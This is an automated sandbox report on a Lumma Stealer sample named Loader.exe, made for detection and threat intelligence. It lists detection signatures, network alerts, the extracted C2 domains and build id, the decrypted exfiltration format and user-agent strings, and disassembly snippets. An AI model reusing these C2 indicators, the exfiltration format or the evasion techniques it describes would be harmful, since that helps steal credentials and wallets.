Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:Loader.exe
Analysis ID:1532242
MD5:cb50acc9b951b52306b95eaf8d4e2048
SHA1:fd087d7b18d9dd37cb68f811f72de6c0dbbbfd31
SHA256:16fd5c981d6da5cbd47293b35b0dd26c756493fe3f88d5613810a2f9b5159b39
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain checking for user administrative privileges
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Loader.exe (PID: 7096 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: CB50ACC9B951B52306B95EAF8D4E2048)
    • Loader.exe (PID: 6972 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: CB50ACC9B951B52306B95EAF8D4E2048)
    • Loader.exe (PID: 5200 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: CB50ACC9B951B52306B95EAF8D4E2048)
      • WerFault.exe (PID: 2936 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1884 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 5668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1904 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5392 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 284 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["condifendteu.sbs", "resinedyw.sbs", "drawwyobstacw.sbs", "enlargkiw.sbs", "ehticsprocw.sbs", "allocatinow.sbs", "vennurviot.sbs", "mathcucom.sbs", "widdensmoywi.sbs"], "Build id": "HpOoIh--@qjwo1"}
SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:03.754512+020020546531A Network Trojan was detected192.168.2.649710104.21.8.37443TCP
    2024-10-12T22:36:04.696511+020020546531A Network Trojan was detected192.168.2.649713188.114.96.3443TCP
    2024-10-12T22:36:05.691027+020020546531A Network Trojan was detected192.168.2.649715104.21.33.249443TCP
    2024-10-12T22:36:06.659354+020020546531A Network Trojan was detected192.168.2.649718172.67.205.156443TCP
    2024-10-12T22:36:07.640105+020020546531A Network Trojan was detected192.168.2.649720172.67.140.193443TCP
    2024-10-12T22:36:08.737000+020020546531A Network Trojan was detected192.168.2.649721172.67.173.224443TCP
    2024-10-12T22:36:09.687676+020020546531A Network Trojan was detected192.168.2.649732104.21.79.35443TCP
    2024-10-12T22:36:10.665845+020020546531A Network Trojan was detected192.168.2.649738188.114.96.3443TCP
    2024-10-12T22:36:12.787291+020020546531A Network Trojan was detected192.168.2.649755172.67.206.204443TCP
    2024-10-12T22:36:13.768308+020020546531A Network Trojan was detected192.168.2.649761172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:03.754512+020020498361A Network Trojan was detected192.168.2.649710104.21.8.37443TCP
    2024-10-12T22:36:04.696511+020020498361A Network Trojan was detected192.168.2.649713188.114.96.3443TCP
    2024-10-12T22:36:05.691027+020020498361A Network Trojan was detected192.168.2.649715104.21.33.249443TCP
    2024-10-12T22:36:06.659354+020020498361A Network Trojan was detected192.168.2.649718172.67.205.156443TCP
    2024-10-12T22:36:07.640105+020020498361A Network Trojan was detected192.168.2.649720172.67.140.193443TCP
    2024-10-12T22:36:08.737000+020020498361A Network Trojan was detected192.168.2.649721172.67.173.224443TCP
    2024-10-12T22:36:09.687676+020020498361A Network Trojan was detected192.168.2.649732104.21.79.35443TCP
    2024-10-12T22:36:10.665845+020020498361A Network Trojan was detected192.168.2.649738188.114.96.3443TCP
    2024-10-12T22:36:12.787291+020020498361A Network Trojan was detected192.168.2.649755172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:13.768308+020020498121A Network Trojan was detected192.168.2.649761172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:09.254568+020020565591Domain Observed Used for C2 Detected192.168.2.649732104.21.79.35443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:10.181687+020020565571Domain Observed Used for C2 Detected192.168.2.649738188.114.96.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:08.298990+020020565611Domain Observed Used for C2 Detected192.168.2.649721172.67.173.224443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:05.271502+020020565671Domain Observed Used for C2 Detected192.168.2.649715104.21.33.249443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:04.269367+020020565711Domain Observed Used for C2 Detected192.168.2.649713188.114.96.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:06.214986+020020565651Domain Observed Used for C2 Detected192.168.2.649718172.67.205.156443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:07.184611+020020565631Domain Observed Used for C2 Detected192.168.2.649720172.67.140.193443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:03.254074+020020565731Domain Observed Used for C2 Detected192.168.2.649710104.21.8.37443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:04.698408+020020565681Domain Observed Used for C2 Detected192.168.2.6537861.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:08.748838+020020565581Domain Observed Used for C2 Detected192.168.2.6583541.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:09.689166+020020565561Domain Observed Used for C2 Detected192.168.2.6501351.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:07.803851+020020565601Domain Observed Used for C2 Detected192.168.2.6631491.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:04.758725+020020565661Domain Observed Used for C2 Detected192.168.2.6503811.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:03.762048+020020565701Domain Observed Used for C2 Detected192.168.2.6644931.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:05.716570+020020565641Domain Observed Used for C2 Detected192.168.2.6502221.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:06.687782+020020565621Domain Observed Used for C2 Detected192.168.2.6518431.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:02.740997+020020565721Domain Observed Used for C2 Detected192.168.2.6559881.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-12T22:36:12.025576+020028586661Domain Observed Used for C2 Detected192.168.2.649744104.102.49.254443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Loader.exeAvira: detected
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/badgesURL Reputation: Label: malware
    Source: 3.2.Loader.exe.400000.1.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["condifendteu.sbs", "resinedyw.sbs", "drawwyobstacw.sbs", "enlargkiw.sbs", "ehticsprocw.sbs", "allocatinow.sbs", "vennurviot.sbs", "mathcucom.sbs", "widdensmoywi.sbs"], "Build id": "HpOoIh--@qjwo1"}
    Source: vennurviot.sbsVirustotal: Detection: 16%Perma Link
    Source: sergei-esenin.comVirustotal: Detection: 17%Perma Link
    Source: Loader.exeReversingLabs: Detection: 42%
    Source: Loader.exeVirustotal: Detection: 41%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
    Source: Loader.exeJoe Sandbox ML: detected
    Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: drawwyobstacw.sbs
    Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: condifendteu.sbs
    Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ehticsprocw.sbs
    Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: vennurviot.sbs
    Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: resinedyw.sbs
    Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: enlargkiw.sbs
    Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: allocatinow.sbs
    Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: mathcucom.sbs
    Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: widdensmoywi.sbs
    Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
    Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
    Source: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: HpOoIh--@qjwo1
    Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.21.8.37:443 -> 192.168.2.6:49710 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.33.249:443 -> 192.168.2.6:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.205.156:443 -> 192.168.2.6:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.6:49720 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.6:49721 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.6:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49738 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49744 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49755 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49761 version: TLS 1.2
    Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001A9DAA FindFirstFileExW,0_2_001A9DAA
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_001A9DAA FindFirstFileExW,2_2_001A9DAA
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], dl0_2_001EE020
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edi, dword ptr [esp+38h]0_2_001E8070
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov dword ptr [esp], 00000000h0_2_001DC080
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then push 2CCA4B49h0_2_001CC144
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx-43CF5BD5h]0_2_001F02BA
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 87573896h0_2_002042E0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx0_2_001EA3A5
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp byte ptr [ebx+eax], 00000000h0_2_001DC3E0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 03BA5404h0_2_001FE4F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_001EE56A
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h0_2_001FE650
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx0_2_001DC673
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edi, ecx0_2_001CE672
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx0_2_001DE6E0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax0_2_001CE7A8
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then push esi0_2_001EA813
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+74h]0_2_001F0892
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+74h]0_2_001F0892
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 62429966h0_2_001FE9A0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h0_2_001EC9F2
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_001C4A90
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp dword ptr [0044EF6Ch]0_2_001EAAD8
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], FFFF4170h0_2_00204B30
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h0_2_001EAB28
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-2D586584h]0_2_001FABBD
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+312BE668h]0_2_001FEBC0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 7B3AFDABh0_2_001FEBC0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]0_2_001FCD00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-0000008Dh]0_2_001CAD60
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 53F09CFAh0_2_001DCE13
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h0_2_001DCE13
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h0_2_001DCE13
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], C59B8BCBh0_2_00204E00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebp, word ptr [eax]0_2_00204E00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then lea eax, dword ptr [esp+48h]0_2_001E8E5D
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov esi, dword ptr [esp+18h]0_2_001BEF00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-1Eh]0_2_001CCFC0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then push eax0_2_00200FD0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 731CDBF3h0_2_001FEFE0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+5715E8D1h]0_2_001FEFE0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_001ED1F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], dx0_2_001E31E2
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, ebx0_2_001E31E2
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax-17h]0_2_001E31E2
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h0_2_001E5250
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h0_2_001E9400
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C85F7986h0_2_001E9400
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-3643ABD5h]0_2_001EB430
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx0_2_001E7490
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_001C35F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax0_2_002017E4
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+14h]0_2_001CB7C0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+ebx+04h]0_2_001CB7C0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-73239D8Bh]0_2_001E97F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_001F77F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_001ED800
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [ecx]0_2_001CD843
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [ebp+esi-1Eh]0_2_002018B5
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov eax, ebx0_2_001CD8F6
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [esi+ecx+02h], 0000h0_2_001DFA3E
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp byte ptr [edi+ecx], 00000000h0_2_00203B77
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx0_2_00203EC4
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h0_2_001EBF45
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then lea edi, dword ptr [esp+04h]0_2_001EBF45
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx0_2_001EBFD7
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [esi], cx0_2_001DFFF7
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp edi0_2_00201FD2
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax3_2_004438E4
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [ebp+esi-1Eh]3_2_004439B5
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-2D586584h]3_2_0043CCC5
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp edi3_2_00443D4F
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-0000008Dh]3_2_0040CE60
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h3_2_0042E049
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then lea edi, dword ptr [esp+04h]3_2_0042E049
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov esi, dword ptr [esp+18h]3_2_00401000
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-1Eh]3_2_0040F0C0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then push eax3_2_004430D0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0042E0D7
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 731CDBF3h3_2_004410E0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+5715E8D1h]3_2_004410E0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx-43CF5BD5h]3_2_004320A3
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], dl3_2_00430120
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_00430120
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov dword ptr [esp], 00000000h3_2_0041E180
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then push 2CCA4B49h3_2_0040E244
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], dx3_2_004252E2
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, ebx3_2_004252E2
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax-17h]3_2_004252E2
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx3_2_0042C2EE
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042F2F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp byte ptr [edi+ecx], 00000000h3_2_004452A0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx3_2_004452A0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h3_2_00427350
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx3_2_00429370
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edi, dword ptr [esp+38h]3_2_00429370
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 87573896h3_2_004463E0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp byte ptr [edi+ecx], 00000000h3_2_004453F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx3_2_004453F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp byte ptr [ebx+eax], 00000000h3_2_0041E4E0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h3_2_0042B500
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C85F7986h3_2_0042B500
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx3_2_00429500
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-3643ABD5h]3_2_0042D530
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 03BA5404h3_2_004405F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp byte ptr [edi+ecx], 00000000h3_2_004455B0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx3_2_004455B0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx3_2_0041E670
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]3_2_004056F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h3_2_00440750
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edi, ecx3_2_00410772
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp byte ptr [edi+ecx], 00000000h3_2_00445700
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx3_2_00445700
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h3_2_0042E7C2
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004207E0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp byte ptr [edi+ecx], 00000000h3_2_004457F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx3_2_004457F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [ecx]3_2_0040F819
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov eax, ebx3_2_0040F819
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+14h]3_2_0040D8C0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edi, byte ptr [esp+ebx+04h]3_2_0040D8C0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-73239D8Bh]3_2_0042B8F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_004398F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax3_2_004108A8
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_0042F900
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then push esi3_2_0042C913
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+74h]3_2_00432992
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+74h]3_2_00432992
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [esi+ecx+02h], 0000h3_2_00421A60
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 62429966h3_2_00440AA0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp byte ptr [edi+ecx], 00000000h3_2_00445B20
